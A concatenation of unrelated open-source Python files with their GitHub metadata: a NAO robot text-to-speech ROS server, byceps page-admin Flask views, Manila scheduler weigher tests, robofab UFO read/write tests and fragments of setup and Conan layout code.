["luxio/_luxio.pyx", "luxio/_luxio.pxd"],
language="c++",
libraries=['luxio']
)
],
cmdclass={'build_ext': build_ext},
)
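# Build sketch (assumes Cython and the Lux IO C++ library and headers are
# installed; 'build_ext' is wired to Cython's builder via cmdclass above):
#
#     python setup.py build_ext --inplace
#     python setup.py install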
| {
"content_hash": "457bfcff2b5d1fc607b031e76b4534e6",
"timestamp": "",
"source": "github",
"line_count": 37,
"max_line_length": 53,
"avg_line_length": 26.56756756756757,
"alnum_prop": 0.6429298067141404,
"repo_name": "gonsuke/python-luxio",
"id": "580fecb1040763e5d5e14ab459fa5b20af6739d6",
"size": "983",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "17"
},
{
"name": "C++",
"bytes": "138567"
},
{
"name": "Python",
"bytes": "9440"
}
],
"symlink_target": ""
} |
import rospy
import re
import md5
from hri_msgs.srv import TextToSpeechSubsentenceDurationResponse
from hri_framework import ITextToSpeechActionServer
from nao_hri import NaoNode
import rospkg
import naoqi
class TextToSpeechCache():
def __init__(self):
self.tts_time_hashes = {}
self.file_name = None
def load_tts_cache(self, path):
self.file_name = path
self.tts_time_hashes = {}
tts_cache = open(path, "r")
for line in tts_cache:
columns = re.split(";", line.strip())
if len(columns) == 3:
md5_hash = columns[0]
times = re.split(",", columns[1])
self.tts_time_hashes[md5_hash] = times
tts_cache.close()
rospy.loginfo("TTS cache loaded. File: {0} ".format(path))
def get_id(self, sentence):
return str(md5.new(sentence).hexdigest())
def is_cached(self, sentence):
md5_digest = self.get_id(sentence)
if md5_digest in self.tts_time_hashes:
return True
else:
return False
def get_sentence_times(self, sentence):
return self.tts_time_hashes[self.get_id(sentence)]
def add_sentence(self, sentence, word_times):
with open(self.file_name, "a") as tts_cache:
md5_digest = self.get_id(sentence)
tts_cache.write(md5_digest + ";" + str(word_times).replace("[", "").replace("]", "") + ";" + sentence.replace(";", "") + "\n")
self.tts_time_hashes[md5_digest] = word_times
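# Usage sketch for the cache (hypothetical file path; each cache line is
# "md5;comma-separated word times;sentence"):
#
#     cache = TextToSpeechCache()
#     cache.load_tts_cache('/tmp/tts_cache.txt')
#     if not cache.is_cached('hello world'):
#         cache.add_sentence('hello world', [0.0, 0.4, 0.9])
#     times = cache.get_sentence_times('hello world')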
class NaoTextToSpeechActionServer(ITextToSpeechActionServer, NaoNode):
def __init__(self):
ITextToSpeechActionServer.__init__(self)
self.tts_cache = TextToSpeechCache()
# Text to speech arguments
self.num_words_sentence = 0
self.current_word_index = 0
self.word_times = []
self.start_time = None
self.calc_synth_times = True
self.utterance_id = None
# Naoqi
self.tts_proxy = None
self.mem_proxy = None
def start(self):
if rospy.has_param("nao_tts_cache"):
path = rospy.get_param("nao_tts_cache")
self.tts_cache.load_tts_cache(path)
module_name = self.get_instance_name(globals())
NaoNode.__init__(self, module_name)
self.tts_proxy = self.get_proxy('ALTextToSpeech')
self.mem_proxy = self.get_proxy('ALMemory')
self.subscribe()
ITextToSpeechActionServer.start(self)
else:
raise Exception('nao_tts_cache parameter not found')
def synthesise_sentence(self, sentence):
self.num_words_sentence = NaoTextToSpeechActionServer.words_in_text(sentence)
self.current_word_index = 0
self.word_times = []
self.word_times.append(0.0)
self.start_time = rospy.get_time()
if self.tts_cache.is_cached(sentence):
self.calc_synth_times = False
else:
self.calc_synth_times = True
self.utterance_id = self.tts_proxy.post.say(sentence)
rospy.loginfo("Synthesis started: '{0}'".format(sentence))
def tts_subsentence_duration(self, sentence, start_word_index, end_word_index):
# If have spoken sentence before, then get the length of time it took to speak each word
# and return duration of subsentence
if self.tts_cache.is_cached(sentence):
times = self.tts_cache.get_sentence_times(sentence)
duration = float(times[end_word_index]) - float(times[start_word_index]) # End word is beginning of next word
else:
# Else estimate the length of time it takes to speak a subsentence
words = NaoTextToSpeechActionServer.get_words(sentence)
sub_text = ''
for i in range(start_word_index, end_word_index):
sub_text += words[i] + ' '
num_characters = len(sub_text)
duration = num_characters * 0.092055994
return duration
def current_word_changed(self, event_name, value, sub_id):
if self.current_word_index != 0 and self.server.is_active():
word_start_time = rospy.get_time() - self.start_time
self.word_times.append(word_start_time)
self.send_feedback(self.current_word_index)
self.current_word_index += 1
def word_pos_changed(self, event_name, value, sub_id):
# If at end of sentence...
if self.server.is_active() and self.current_word_index >= self.num_words_sentence and value == 0:
word_start_time = rospy.get_time() - self.start_time
self.word_times.append(word_start_time)
if self.calc_synth_times:
self.tts_cache.add_sentence(self.server.current_goal.get_goal().sentence, self.word_times)
self.synthesis_finished()
def on_shutdown(self):
self.unsubscribe()
def cancel_tts_synthesis(self):
self.tts_proxy.stop(self.utterance_id)
@staticmethod
def words_in_text(text):
        valid_words_regex = r"\w+[']{0,1}\w*[!?,.]{0,1}"
return len(re.findall(valid_words_regex, text))
@staticmethod
def get_words(text):
        valid_words_regex = r"\w+[']{0,1}\w*[!?,.]{0,1}"
return re.findall(valid_words_regex, text)
def subscribe(self):
self.tts_proxy.enableNotifications()
self.mem_proxy.subscribeToEvent("ALTextToSpeech/PositionOfCurrentWord", self.module_name, "word_pos_changed")
self.mem_proxy.subscribeToEvent("ALTextToSpeech/CurrentWord", self.module_name, "current_word_changed")
rospy.loginfo("Subscribed to ALTextToSpeech events.")
def unsubscribe(self):
self.mem_proxy.unsubscribeToEvent("ALTextToSpeech/PositionOfCurrentWord", self.module_name)
self.mem_proxy.unsubscribeToEvent("ALTextToSpeech/CurrentWord", self.module_name)
self.tts_proxy.disableNotifications()
rospy.loginfo("Un-subscribed from ALTextToSpeech events.")
if __name__ == '__main__':
rospy.init_node('tts_action_server')
tts_server = NaoTextToSpeechActionServer()
tts_server.start()
    rospy.spin()
| {
"content_hash": "180896f193c012ea222585b0bb118e4e",
"timestamp": "",
"source": "github",
"line_count": 171,
"max_line_length": 138,
"avg_line_length": 36.06432748538012,
"alnum_prop": 0.6189395167828766,
"repo_name": "jdddog/nao_hri",
"id": "11117f1793f45bbf1256f16250b32bad92b62f30",
"size": "7730",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "scripts/nao_tts_action_server_node.py",
"mode": "33261",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "73826"
}
],
"symlink_target": ""
} |
from multiprocessing import cpu_count
from numpy import floor
# from mkl import set_num_threads # mkl is never used outside of this
def configure(
num_jobs: int = 8,
test: bool = False,
subtract: int = 1,
num_proc: int = None,
num_thread_per_proc: int = None,
) -> int:
"""
num_jobs is typically the # of genes we are parallelizing over
"""
if num_proc is None:
num_proc = cpu_count() - subtract
if num_jobs > num_proc:
num_jobs = num_proc
if num_thread_per_proc is None:
num_thread_per_proc = int(floor(num_proc / num_jobs))
if test:
num_jobs = 1
num_thread_per_proc = 1
# try:
# set_num_threads(num_thread_per_proc)
# except ImportError:
# print("MKL not available, so I'm not adjusting the number of threads")
# print(f"Launching {num_jobs} jobs with {num_thread_per_proc} MKL threads each")
return num_jobs
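# Worked example (assuming an 8-core machine): cpu_count() == 8 and
# subtract == 1 give num_proc == 7; a requested num_jobs of 8 is clamped to 7;
# num_thread_per_proc defaults to floor(7 / 7) == 1; the function returns 7.
#
#     num_jobs = configure(num_jobs=8)  # -> 7 on that hypothetical machine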
| {
"content_hash": "4fde2941919078da5a11aa4f05468465",
"timestamp": "",
"source": "github",
"line_count": 40,
"max_line_length": 85,
"avg_line_length": 23.575,
"alnum_prop": 0.616118769883351,
"repo_name": "pablocarderam/genetargeter",
"id": "b667c8a30e226c330d6c596b969cd39f71c0359a",
"size": "943",
"binary": false,
"copies": "1",
"ref": "refs/heads/python3",
"path": "gRNAScores/azimuth/local_multiprocessing.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "C++",
"bytes": "16396"
},
{
"name": "CSS",
"bytes": "7323"
},
{
"name": "HTML",
"bytes": "27988"
},
{
"name": "JavaScript",
"bytes": "412639"
},
{
"name": "Procfile",
"bytes": "21"
},
{
"name": "Python",
"bytes": "551082"
}
],
"symlink_target": ""
} |
"""
byceps.blueprints.admin.page.views
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
:Copyright: 2014-2022 Jochen Kupperschmidt
:License: Revised BSD (see `LICENSE` file for details)
"""
from typing import Optional
from flask import abort, g, request, url_for
from flask_babel import format_datetime, gettext
from ....services.page import service as page_service
from ....services.page.transfer.models import Page, Version, VersionID
from ....services.site import service as site_service
from ....services.site.transfer.models import Site, SiteID
from ....services.text_diff import service as text_diff_service
from ....services.user import service as user_service
from ....signals import page as page_signals
from ....util.framework.blueprint import create_blueprint
from ....util.framework.flash import flash_error, flash_success
from ....util.framework.templating import templated
from ....util.iterables import pairwise
from ....util.views import (
permission_required,
redirect_to,
respond_no_content_with_location,
)
from ...site.page.templating import build_template_context
from .forms import CreateForm, UpdateForm
blueprint = create_blueprint('page_admin', __name__)
@blueprint.get('/for_site/<site_id>')
@permission_required('page.view')
@templated
def index_for_site(site_id):
"""List pages for that site."""
site = _get_site(site_id)
pages = page_service.get_pages_for_site_with_current_versions(site.id)
user_ids = {page.current_version.creator_id for page in pages}
users = user_service.get_users(user_ids, include_avatars=True)
users_by_id = user_service.index_users_by_id(users)
return {
'pages': pages,
'users_by_id': users_by_id,
'site': site,
}
@blueprint.get('/pages/<uuid:page_id>/current_version')
@permission_required('page.view')
def view_current_version(page_id):
"""Show the current version of the page."""
current_version_id = page_service.find_current_version_id(page_id)
if current_version_id is None:
abort(404)
return view_version(current_version_id)
@blueprint.get('/versions/<uuid:version_id>')
@permission_required('page.view_history')
@templated
def view_version(version_id):
"""Show the page with the given id."""
version = _get_version(version_id)
page = page_service.get_page(version.page_id)
site = site_service.get_site(page.site_id)
creator = user_service.get_user(version.creator_id, include_avatar=True)
is_current_version = page_service.is_current_version(page.id, version.id)
return {
'page': page,
'site': site,
'version': version,
'creator': creator,
'is_current_version': is_current_version,
}
@blueprint.get('/versions/<uuid:version_id>/preview')
@permission_required('page.view_history')
@templated
def view_version_preview(version_id):
"""Show a preview of the page version."""
version = _get_version(version_id)
try:
template_context = build_template_context(
version.title, version.head, version.body
)
return {
'title': template_context['page_title'],
'head': template_context['head'],
'body': template_context['body'],
'error_occurred': False,
}
except Exception as e:
return {
'error_occurred': True,
'error_message': str(e),
}
@blueprint.get('/pages/<uuid:page_id>/history')
@permission_required('page.view_history')
@templated
def history(page_id):
"""Show index of page versions."""
page = _get_page(page_id)
versions = page_service.get_versions(page.id)
versions_pairwise = list(pairwise(versions + [None]))
user_ids = {version.creator_id for version in versions}
users = user_service.get_users(user_ids, include_avatars=True)
users_by_id = user_service.index_users_by_id(users)
site = site_service.get_site(page.site_id)
return {
'page': page,
'versions_pairwise': versions_pairwise,
'users_by_id': users_by_id,
'site': site,
}
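# Note on the history view above: pairwise(versions + [None]) yields
# consecutive (newer, older) pairs, e.g. [v3, v2, v1, None] becomes
# [(v3, v2), (v2, v1), (v1, None)] (illustrative values), so the template can
# link each version to its predecessor for comparison.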
@blueprint.get('/pages/<uuid:from_version_id>/compare_to/<uuid:to_version_id>')
@permission_required('page.view_history')
@templated
def compare(from_version_id, to_version_id):
"""Show the difference between two versions."""
from_version = _get_version(from_version_id)
to_version = _get_version(to_version_id)
if from_version.page_id != to_version.page_id:
abort(400, 'The versions do not belong to the same page.')
html_diff_title = _create_html_diff(from_version, to_version, 'title')
html_diff_head = _create_html_diff(from_version, to_version, 'head')
html_diff_body = _create_html_diff(from_version, to_version, 'body')
page = page_service.get_page(from_version.page_id)
site = site_service.get_site(page.site_id)
return {
'page': page,
'diff_title': html_diff_title,
'diff_head': html_diff_head,
'diff_body': html_diff_body,
'site': site,
}
def _create_html_diff(
from_version: Version,
to_version: Version,
attribute_name: str,
) -> Optional[str]:
"""Create an HTML diff between the named attribute's value of each
of the two versions.
"""
from_description = format_datetime(from_version.created_at)
to_description = format_datetime(to_version.created_at)
from_text = getattr(from_version, attribute_name)
to_text = getattr(to_version, attribute_name)
return text_diff_service.create_html_diff(
from_text, to_text, from_description, to_description
)
@blueprint.get('/for_site/<site_id>/create')
@permission_required('page.create')
@templated
def create_form(site_id, erroneous_form=None):
"""Show form to create a page."""
site = _get_site(site_id)
form = erroneous_form if erroneous_form else CreateForm()
form.set_language_code_choices()
return {
'form': form,
'site': site,
}
@blueprint.post('/for_site/<site_id>')
@permission_required('page.create')
def create(site_id):
"""Create a page."""
site = _get_site(site_id)
form = CreateForm(request.form)
form.set_language_code_choices()
if not form.validate():
return create_form(site.id, form)
name = form.name.data.strip().lower()
language_code = form.language_code.data
url_path = form.url_path.data.strip()
creator = g.user
title = form.title.data.strip()
head = form.head.data.strip()
body = form.body.data.strip()
version, event = page_service.create_page(
site.id,
name,
language_code,
url_path,
creator.id,
title,
body,
head=head,
)
flash_success(gettext('Page has been created.'))
page_signals.page_created.send(None, event=event)
return redirect_to('.view_version', version_id=version.id)
@blueprint.get('/pages/<uuid:page_id>/update')
@permission_required('page.update')
@templated
def update_form(page_id, erroneous_form=None):
"""Show form to update a page."""
page = _get_page(page_id)
current_version_id = page_service.find_current_version_id(page.id)
page_aggregate = page_service.find_page_aggregate(current_version_id)
form = erroneous_form if erroneous_form else UpdateForm(obj=page_aggregate)
form.set_language_code_choices()
site = site_service.get_site(page.site_id)
return {
'form': form,
'page': page,
'site': site,
}
@blueprint.post('/pages/<uuid:page_id>')
@permission_required('page.update')
def update(page_id):
"""Update a page."""
page = _get_page(page_id)
form = UpdateForm(request.form)
form.set_language_code_choices()
if not form.validate():
return update_form(page.id, form)
language_code = form.language_code.data
url_path = form.url_path.data.strip()
creator = g.user
title = form.title.data.strip()
head = form.head.data.strip()
body = form.body.data.strip()
version, event = page_service.update_page(
page.id,
language_code,
url_path,
creator.id,
title,
head,
body,
)
flash_success(gettext('Page has been updated.'))
page_signals.page_updated.send(None, event=event)
return redirect_to('.view_version', version_id=version.id)
@blueprint.delete('/pages/<uuid:page_id>')
@permission_required('page.delete')
@respond_no_content_with_location
def delete(page_id):
"""Delete a page."""
page = _get_page(page_id)
page_name = page.name
site_id = page.site_id
success, event = page_service.delete_page(page.id, initiator_id=g.user.id)
if not success:
flash_error(
gettext('Page "%(name)s" could not be deleted.', name=page_name)
)
return url_for('.view_current_version', page_id=page.id)
flash_success(gettext('Page "%(name)s" has been deleted.', name=page_name))
page_signals.page_deleted.send(None, event=event)
return url_for('.index_for_site', site_id=site_id)
def _get_site(site_id) -> Site:
site = site_service.find_site(SiteID(site_id))
if site is None:
abort(404)
return site
def _get_page(page_id) -> Page:
page = page_service.find_page(page_id)
if page is None:
abort(404)
return page
def _get_version(version_id: VersionID) -> Version:
version = page_service.find_version(version_id)
if version is None:
abort(404)
return version
| {
"content_hash": "75e246dda7369ea95bbd10bbd2f4726d",
"timestamp": "",
"source": "github",
"line_count": 347,
"max_line_length": 79,
"avg_line_length": 27.46397694524496,
"alnum_prop": 0.6508919202518363,
"repo_name": "homeworkprod/byceps",
"id": "ac56e6e472f866e22d452b68c5f50004257fbc9f",
"size": "9530",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "byceps/blueprints/admin/page/views.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "38198"
},
{
"name": "HTML",
"bytes": "318830"
},
{
"name": "JavaScript",
"bytes": "8541"
},
{
"name": "Python",
"bytes": "935249"
}
],
"symlink_target": ""
} |
"""
Tests for Host Affinity Weigher.
"""
from unittest import mock
from manila.common import constants
from manila.db import api as db_api
from manila.scheduler.weighers import host_affinity
from manila import test
from manila.tests import db_utils
from manila.tests.scheduler import fakes
class HostAffinityWeigherTestCase(test.TestCase):
def setUp(self):
super(HostAffinityWeigherTestCase, self).setUp()
self.weigher = host_affinity.HostAffinityWeigher()
@staticmethod
def _create_weight_properties(snapshot_id=None,
snapshot_host=None,
availability_zone_id=None):
return {
'request_spec': {
'snapshot_id': snapshot_id,
'snapshot_host': snapshot_host,
},
'availability_zone_id': availability_zone_id,
}
def test_without_snapshot_id(self):
host_state = fakes.FakeHostState('host1', {
'host': 'host1@AAA#pool2',
})
weight_properties = self._create_weight_properties(
snapshot_host='fake_snapshot_host')
weight = self.weigher._weigh_object(host_state, weight_properties)
self.assertEqual(0, weight)
def test_without_snapshot_host(self):
host_state = fakes.FakeHostState('host1', {
'host': 'host1@AAA#pool2',
})
weight_properties = self._create_weight_properties(
snapshot_id='fake_snapshot_id')
weight = self.weigher._weigh_object(host_state, weight_properties)
self.assertEqual(0, weight)
def test_same_backend_and_pool(self):
share = db_utils.create_share(host="host1@AAA#pool1",
status=constants.STATUS_AVAILABLE)
snapshot = db_utils.create_snapshot(share_id=share['id'])
self.mock_object(db_api, 'share_snapshot_get',
mock.Mock(return_value=snapshot))
host_state = fakes.FakeHostState('host1@AAA#pool1', {})
weight_properties = self._create_weight_properties(
snapshot_id=snapshot['id'], snapshot_host=share['host'])
weight = self.weigher._weigh_object(host_state, weight_properties)
self.assertEqual(100, weight)
def test_same_backend_different_pool(self):
share = db_utils.create_share(host="host1@AAA#pool1",
status=constants.STATUS_AVAILABLE)
snapshot = db_utils.create_snapshot(share_id=share['id'])
self.mock_object(db_api, 'share_snapshot_get',
mock.Mock(return_value=snapshot))
host_state = fakes.FakeHostState('host1@AAA#pool2', {})
weight_properties = self._create_weight_properties(
snapshot_id=snapshot['id'], snapshot_host=share['host'])
weight = self.weigher._weigh_object(host_state, weight_properties)
self.assertEqual(75, weight)
def test_different_backend_same_availability_zone(self):
share = db_utils.create_share(
host="host1@AAA#pool1", status=constants.STATUS_AVAILABLE,
availability_zone=fakes.FAKE_AZ_1['name'])
snapshot = db_utils.create_snapshot(share_id=share['id'])
self.mock_object(db_api, 'share_snapshot_get',
mock.Mock(return_value=snapshot))
self.mock_object(db_api, 'availability_zone_get',
mock.Mock(return_value=type(
'FakeAZ', (object, ), {
'id': fakes.FAKE_AZ_1['id'],
'name': fakes.FAKE_AZ_1['name'],
})))
host_state = fakes.FakeHostState('host2@BBB#pool1', {})
weight_properties = self._create_weight_properties(
snapshot_id=snapshot['id'], snapshot_host=share['host'],
availability_zone_id='zone1')
weight = self.weigher._weigh_object(host_state, weight_properties)
self.assertEqual(50, weight)
def test_different_backend_and_availability_zone(self):
share = db_utils.create_share(
host="host1@AAA#pool1", status=constants.STATUS_AVAILABLE,
availability_zone=fakes.FAKE_AZ_1['name'])
snapshot = db_utils.create_snapshot(share_id=share['id'])
self.mock_object(db_api, 'share_snapshot_get',
mock.Mock(return_value=snapshot))
self.mock_object(db_api, 'availability_zone_get',
mock.Mock(return_value=type(
'FakeAZ', (object,), {
'id': fakes.FAKE_AZ_2['id'],
'name': fakes.FAKE_AZ_2['name'],
})))
host_state = fakes.FakeHostState('host2@BBB#pool1', {})
weight_properties = self._create_weight_properties(
snapshot_id=snapshot['id'], snapshot_host=share['host'],
availability_zone_id='zone1'
)
weight = self.weigher._weigh_object(host_state, weight_properties)
self.assertEqual(25, weight)
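# Summary of the weights exercised above (as asserted by these tests):
# same backend and pool -> 100, same backend/different pool -> 75,
# different backend/same AZ -> 50, different backend and AZ -> 25,
# missing snapshot id or snapshot host -> 0.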
| {
"content_hash": "2b9b8d84b96b1f3fec103fb38099e9e2",
"timestamp": "",
"source": "github",
"line_count": 123,
"max_line_length": 74,
"avg_line_length": 41.65853658536585,
"alnum_prop": 0.582552693208431,
"repo_name": "openstack/manila",
"id": "6b5d809bf2562d4fe2fec89907a8a6d05f1c9ffa",
"size": "5752",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "manila/tests/scheduler/weighers/test_host_affinity.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Mako",
"bytes": "953"
},
{
"name": "Python",
"bytes": "12728998"
},
{
"name": "Shell",
"bytes": "107601"
}
],
"symlink_target": ""
} |
import os
import shutil
import unittest
import tempfile
from robofab.plistlib import readPlist
import robofab
from robofab.test.testSupport import fontInfoVersion2, expectedFontInfo1To2Conversion, expectedFontInfo2To1Conversion
from robofab.objects.objectsRF import NewFont, OpenFont
from robofab.ufoLib import UFOReader
ufoPath1 = os.path.dirname(robofab.__file__)
ufoPath1 = os.path.dirname(ufoPath1)
ufoPath1 = os.path.dirname(ufoPath1)
ufoPath1 = os.path.join(ufoPath1, "TestData", "TestFont1 (UFO1).ufo")
ufoPath2 = ufoPath1.replace("TestFont1 (UFO1).ufo", "TestFont1 (UFO2).ufo")
# robofab should remove these from the lib after a load.
removeFromFormatVersion1Lib = [
"org.robofab.opentype.classes",
"org.robofab.opentype.features",
"org.robofab.opentype.featureorder",
"org.robofab.postScriptHintData"
]
class ReadUFOFormatVersion1TestCase(unittest.TestCase):
def setUpFont(self):
self.font = OpenFont(ufoPath1)
self.font.update()
def tearDownFont(self):
self.font.close()
self.font = None
def compareToUFO(self, doInfo=True):
reader = UFOReader(ufoPath1)
results = {}
# info
infoMatches = True
info = self.font.info
for attr, expectedValue in list(expectedFontInfo1To2Conversion.items()):
writtenValue = getattr(info, attr)
if expectedValue != writtenValue:
infoMatches = False
break
results["info"]= infoMatches
# kerning
kerning = self.font.kerning.asDict()
expectedKerning = reader.readKerning()
results["kerning"] = expectedKerning == kerning
# groups
groups = dict(self.font.groups)
expectedGroups = reader.readGroups()
results["groups"] = expectedGroups == groups
# features
features = self.font.features.text
f = open(os.path.join(ufoPath2, "features.fea"), "r")
expectedFeatures = f.read()
f.close()
match = True
features = [line for line in features.splitlines() if line]
expectedFeatures = [line for line in expectedFeatures.splitlines() if line]
if expectedFeatures != features or reader.readFeatures() != "":
match = False
results["features"] = match
# lib
lib = dict(self.font.lib)
expectedLib = reader.readLib()
for key in removeFromFormatVersion1Lib:
if key in expectedLib:
del expectedLib[key]
results["lib"] = expectedLib == lib
return results
def testFull(self):
self.setUpFont()
otherResults = self.compareToUFO()
self.assertEqual(otherResults["info"], True)
self.assertEqual(otherResults["kerning"], True)
self.assertEqual(otherResults["groups"], True)
self.assertEqual(otherResults["features"], True)
self.assertEqual(otherResults["lib"], True)
self.tearDownFont()
def testInfo(self):
self.setUpFont()
info = self.font.info
for attr, expectedValue in list(expectedFontInfo1To2Conversion.items()):
writtenValue = getattr(info, attr)
self.assertEqual((attr, expectedValue), (attr, writtenValue))
self.tearDownFont()
class ReadUFOFormatVersion2TestCase(unittest.TestCase):
def setUpFont(self):
self.font = OpenFont(ufoPath2)
self.font.update()
def tearDownFont(self):
self.font.close()
self.font = None
def compareToUFO(self, doInfo=True):
reader = UFOReader(ufoPath2)
results = {}
# info
infoMatches = True
info = self.font.info
for attr, expectedValue in list(fontInfoVersion2.items()):
writtenValue = getattr(info, attr)
if expectedValue != writtenValue:
infoMatches = False
break
results["info"]= infoMatches
# kerning
kerning = self.font.kerning.asDict()
expectedKerning = reader.readKerning()
results["kerning"] = expectedKerning == kerning
# groups
groups = dict(self.font.groups)
expectedGroups = reader.readGroups()
results["groups"] = expectedGroups == groups
# features
features = self.font.features.text
expectedFeatures = reader.readFeatures()
results["features"] = expectedFeatures == features
# lib
lib = dict(self.font.lib)
expectedLib = reader.readLib()
results["lib"] = expectedLib == lib
return results
def testFull(self):
self.setUpFont()
otherResults = self.compareToUFO()
self.assertEqual(otherResults["info"], True)
self.assertEqual(otherResults["kerning"], True)
self.assertEqual(otherResults["groups"], True)
self.assertEqual(otherResults["features"], True)
self.assertEqual(otherResults["lib"], True)
self.tearDownFont()
def testInfo(self):
self.setUpFont()
info = self.font.info
for attr, expectedValue in list(fontInfoVersion2.items()):
writtenValue = getattr(info, attr)
self.assertEqual((attr, expectedValue), (attr, writtenValue))
self.tearDownFont()
class WriteUFOFormatVersion1TestCase(unittest.TestCase):
def setUpFont(self):
        # mkdtemp() creates the directory atomically; mktemp() + mkdir is race-prone.
        self.dstDir = tempfile.mkdtemp()
self.font = OpenFont(ufoPath2)
self.font.save(self.dstDir, formatVersion=1)
def tearDownFont(self):
shutil.rmtree(self.dstDir)
def compareToUFO(self):
readerExpected = UFOReader(ufoPath1)
readerWritten = UFOReader(self.dstDir)
results = {}
# info
matches = True
expectedPath = os.path.join(ufoPath1, "fontinfo.plist")
writtenPath = os.path.join(self.dstDir, "fontinfo.plist")
if not os.path.exists(writtenPath):
matches = False
else:
expected = readPlist(expectedPath)
written = readPlist(writtenPath)
for attr, expectedValue in list(expected.items()):
if expectedValue != written.get(attr):
matches = False
break
results["info"] = matches
# kerning
matches = True
expectedPath = os.path.join(ufoPath1, "kerning.plist")
writtenPath = os.path.join(self.dstDir, "kerning.plist")
if not os.path.exists(writtenPath):
matches = False
else:
matches = readPlist(expectedPath) == readPlist(writtenPath)
results["kerning"] = matches
# groups
matches = True
expectedPath = os.path.join(ufoPath1, "groups.plist")
writtenPath = os.path.join(self.dstDir, "groups.plist")
if not os.path.exists(writtenPath):
matches = False
else:
matches = readPlist(expectedPath) == readPlist(writtenPath)
results["groups"] = matches
# features
matches = True
expectedPath = os.path.join(ufoPath1, "features.fea")
writtenPath = os.path.join(self.dstDir, "features.fea")
if os.path.exists(writtenPath):
matches = False
results["features"] = matches
# lib
matches = True
expectedPath = os.path.join(ufoPath1, "lib.plist")
writtenPath = os.path.join(self.dstDir, "lib.plist")
if not os.path.exists(writtenPath):
matches = False
else:
writtenLib = readPlist(writtenPath)
matches = readPlist(expectedPath) == writtenLib
results["lib"] = matches
return results
def testFull(self):
self.setUpFont()
otherResults = self.compareToUFO()
self.assertEqual(otherResults["info"], True)
self.assertEqual(otherResults["kerning"], True)
self.assertEqual(otherResults["groups"], True)
self.assertEqual(otherResults["features"], True)
self.assertEqual(otherResults["lib"], True)
self.tearDownFont()
class WriteUFOFormatVersion2TestCase(unittest.TestCase):
def setUpFont(self):
        # mkdtemp() creates the directory atomically; mktemp() + mkdir is race-prone.
        self.dstDir = tempfile.mkdtemp()
self.font = OpenFont(ufoPath2)
self.font.save(self.dstDir)
def tearDownFont(self):
shutil.rmtree(self.dstDir)
def compareToUFO(self):
readerExpected = UFOReader(ufoPath2)
readerWritten = UFOReader(self.dstDir)
results = {}
# info
matches = True
expectedPath = os.path.join(ufoPath2, "fontinfo.plist")
writtenPath = os.path.join(self.dstDir, "fontinfo.plist")
if not os.path.exists(writtenPath):
matches = False
else:
expected = readPlist(expectedPath)
written = readPlist(writtenPath)
for attr, expectedValue in list(expected.items()):
if expectedValue != written[attr]:
matches = False
break
results["info"] = matches
# kerning
matches = True
expectedPath = os.path.join(ufoPath2, "kerning.plist")
writtenPath = os.path.join(self.dstDir, "kerning.plist")
if not os.path.exists(writtenPath):
matches = False
else:
matches = readPlist(expectedPath) == readPlist(writtenPath)
results["kerning"] = matches
# groups
matches = True
expectedPath = os.path.join(ufoPath2, "groups.plist")
writtenPath = os.path.join(self.dstDir, "groups.plist")
if not os.path.exists(writtenPath):
matches = False
else:
matches = readPlist(expectedPath) == readPlist(writtenPath)
results["groups"] = matches
# features
matches = True
expectedPath = os.path.join(ufoPath2, "features.fea")
writtenPath = os.path.join(self.dstDir, "features.fea")
if not os.path.exists(writtenPath):
matches = False
else:
f = open(expectedPath, "r")
expectedText = f.read()
f.close()
f = open(writtenPath, "r")
writtenText = f.read()
f.close()
# FontLab likes to add lines to the features, so skip blank lines.
expectedText = [line for line in expectedText.splitlines() if line]
writtenText = [line for line in writtenText.splitlines() if line]
matches = "\n".join(expectedText) == "\n".join(writtenText)
results["features"] = matches
# lib
matches = True
expectedPath = os.path.join(ufoPath2, "lib.plist")
writtenPath = os.path.join(self.dstDir, "lib.plist")
if not os.path.exists(writtenPath):
matches = False
else:
writtenLib = readPlist(writtenPath)
matches = readPlist(expectedPath) == writtenLib
results["lib"] = matches
return results
def testFull(self):
self.setUpFont()
otherResults = self.compareToUFO()
self.assertEqual(otherResults["info"], True)
self.assertEqual(otherResults["kerning"], True)
self.assertEqual(otherResults["groups"], True)
self.assertEqual(otherResults["features"], True)
self.assertEqual(otherResults["lib"], True)
self.tearDownFont()
if __name__ == "__main__":
from robofab.test.testSupport import runTests
runTests()
| {
"content_hash": "368f3408eb8704af7c0b9191fd0ba0d9",
"timestamp": "",
"source": "github",
"line_count": 321,
"max_line_length": 117,
"avg_line_length": 30.35202492211838,
"alnum_prop": 0.722467412501283,
"repo_name": "adrientetar/robofab",
"id": "b948bd7fa03885d646d6364d36ae5c9cbdb9278c",
"size": "9743",
"binary": false,
"copies": "1",
"ref": "refs/heads/python3-ufo3",
"path": "Lib/robofab/test/test_noneLabUFOReadWrite.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "1226417"
}
],
"symlink_target": ""
} |
import os
from collections import OrderedDict
import six
from six.moves import configparser
from conans.errors import ConanException
from conans.model.ref import ConanFileReference, check_valid_ref
from conans.util.files import load
from conans.util.templates import render_layout_file
DEFAULT_LAYOUT_FILE = "default"
LAYOUTS_FOLDER = 'layouts'
def get_editable_abs_path(path, cwd, cache_folder):
# Check the layout file exists, is correct, and get its abs-path
if path:
layout_abs_path = os.path.normpath(os.path.join(cwd, path))
if not os.path.isfile(layout_abs_path):
layout_abs_path = os.path.join(cache_folder, LAYOUTS_FOLDER, path)
if not os.path.isfile(layout_abs_path):
raise ConanException("Couldn't find layout file: %s" % path)
return layout_abs_path
# Default only in cache
layout_default_path = os.path.join(cache_folder, LAYOUTS_FOLDER, DEFAULT_LAYOUT_FILE)
if os.path.isfile(layout_default_path):
return layout_default_path
class EditableLayout(object):
BUILD_FOLDER = "build_folder"
SOURCE_FOLDER = "source_folder"
cpp_info_dirs = ['includedirs', 'libdirs', 'resdirs', 'bindirs', 'builddirs', 'srcdirs', 'frameworkdirs']
folders = [BUILD_FOLDER, SOURCE_FOLDER]
def __init__(self, filepath):
self._filepath = filepath
